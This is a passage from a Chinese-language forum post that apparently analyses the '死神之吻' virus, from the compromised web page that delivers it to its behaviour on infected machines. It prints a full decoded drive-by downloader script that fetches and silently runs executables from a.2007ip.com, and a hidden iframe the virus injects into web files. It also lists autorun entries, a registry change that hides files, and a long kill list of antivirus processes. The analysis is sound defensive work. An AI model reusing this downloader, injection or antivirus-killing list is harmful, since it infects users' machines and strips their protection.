样本来源
http://forum.ikaka.com/topic.asp?board=28&artid=8279815
以前写过这个病毒的一个版本
http://forum.ikaka.com/topic.asp?board=28&artid=8261614
从网页一直分析到病毒为止,开工!
猫叔 提到的那个帖子的网址 已经解密
<script src=http://www.17tc.com/pop.js></script>
跳转
http://www.17tc.com/pop.htm
代码入下
<script>var url,kiss;url="http://a.2007ip.com/*****.exe";kiss="C:\\windows\\gggg.exe";try{var ado=(document.createElement("
object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var xml=ado.Create
Object("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var as=ado.create
object("Adodb.Stream","");xml.Open("GET",url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);as.savetofile(kiss,2);var shell=ado.create
object("Shell.Application","");shell.Shell(pa222th,"","","open",0);}catch(e){};</script>
<script language="VBScript">
on error resume next
j1="clsid:":j2="BD96C556-":j3="65A3-":j4="11D0-":j5="983A-":j6="00C04FC29E36"
j7=j1&j2&j3&j4&j5&j6
Set df = document.createElement("
object")
df.setAttribute "classid", j7
b4="Mi":b5="cr":b6="o":b7="soft":b8=".X":b9="M":b10="L":b11="H":b12="T":b13="T":b14="P"
strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Set x = df.Create
Object(strb,"")
dl = "http://a.2007ip.com/yt.vbs"
:fname1="yt.vbs"
z1="She":z2="ll.A":z3="ppli":z4="cat":z5="io":z6="n"
zz=z1&z2&z3&z4&z5&z6
sub shellexe(zz,fname1)
set Q = df.create
object(zz,""):Q.ShellExecute fname1,"","","open",0
end sub
a4="A":a5="d":a6="o":a7="d":a8="b":a9=".":a10="S":a11="t":a12="r":a13="e":a14="a":a15="m"
strd=a4&a5&a6&a7&a8&a9&a10&a11&a12&a13&a14&a15
set SS = df.create
object(strd,"")
SS.type = 1
f4="G":f5="E":f6="T"
stre=f4&f5&f6
x.Open stre, dl, False
x.Send
SS.close
set F = df.create
object("Scripting.FileSystem
Object","")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
fname1= F.Buildkiss(tmp,fname1)
SS.write x.responseBody
SS.savetofile fname1,2
call shellexe(zz,fname1)
</script>
C:\\windows\\gggg.exe
这个就是 死神之吻 的主体..
就以前的死神 与 这个死神 相比..有所增强..但是bug 多如大米..
样本编写语言:Borland Delphi 6.0 - 7.0
加壳方式:DWing的Upack
释放文件
C:\WINDOWS\system32\Death.SiShen
C:\WINDOWS\system32\spoolsv.exe
C:\pass.dic
F:\1.ico
C:\WINDOWS\system32\Death.SiShen
内容为
[Autorun]
OPEN=Death.exe
shellexecute=Death.exe
shell\Auto\command=Death.exe
创建启动项
[software\microsoft\windows\currentversion\run]
什么都没写入..
修改 显示文件和文件夹 注册表
[HKLM\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
"checkedvalue"=dword:00000000
所有根目录及移动存储生成
X:\autorun.inf
X:\death.exe
[autorun]
\n\nopen=death.exe
\n\nshellexecute=death.exe
\n\nshell\auto\command=death.exe
尝试关闭窗口
symantec antivirus 企业版
江民杀毒软件 kv2006:实时监视
ravmonclass
tflockdownmain
zonealarm
zaframewnd
天网防火墙个人版
tapplication
天网防火墙企业版
tapplication
virusscan
symantec antivirus
duba
wrapped gift killer
icesword
pjf(ustc)
防火墙
tform1
噬菌体
木马克星
尝试关闭进程
eghost.exe
mailmon.exe
kavpfw.exe
iparmor.exe
_avp32.exe
_avpcc.exe
_avpm.exe
avp32.exe
avpcc.exe
avpm.exe
avp.exe
navapw32.exe
navw32.exe
nod32kui.exe
nod32kru.exe
pfw.exe
kfw.exe
kavpfw.exe
vsmon.exe
mcshield.exe
vstskmgr.exe
naprdmgr.exe
updaterui.exe
tbmon.exe
scan32.exe
ravmond.exe
ccenter.exe
ravtask.exe
ravmon.exe
ravstub.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
360safe.exe
360tray.kxp
frogagent.exe
logo1_.exe
logo_1.exe
rundl132.exe
fyfirewall.exe
修改系统进程内存
C:\WINDOWS\system32\winlogon.exe
搜索感染除系统盘以外的 .exe/.scr/.com/.pif/.htm/.html/.asp/.php/.jsp/.aspx 文件
(.exe/.scr/.com/.pif/)上个分析里的死神 是替换 文件..这个版本改为与"熊猫烧香"相同的方法 捆绑
感染的 .htm/.html/.asp/.php/.jsp/.aspx 文件 在尾部加入
<iframe src=http://if.iloveck.com/test/test.htm width=0 height=0></iframe>
访问网络下载其他病毒
http://a.2007ip.com/****/01.exe
~
http://a.2007ip.com/****/10.exe
保存到 c:\1.exe ~ c:\10.exe
利用弱口令访问区域内计算机传播(death.exe)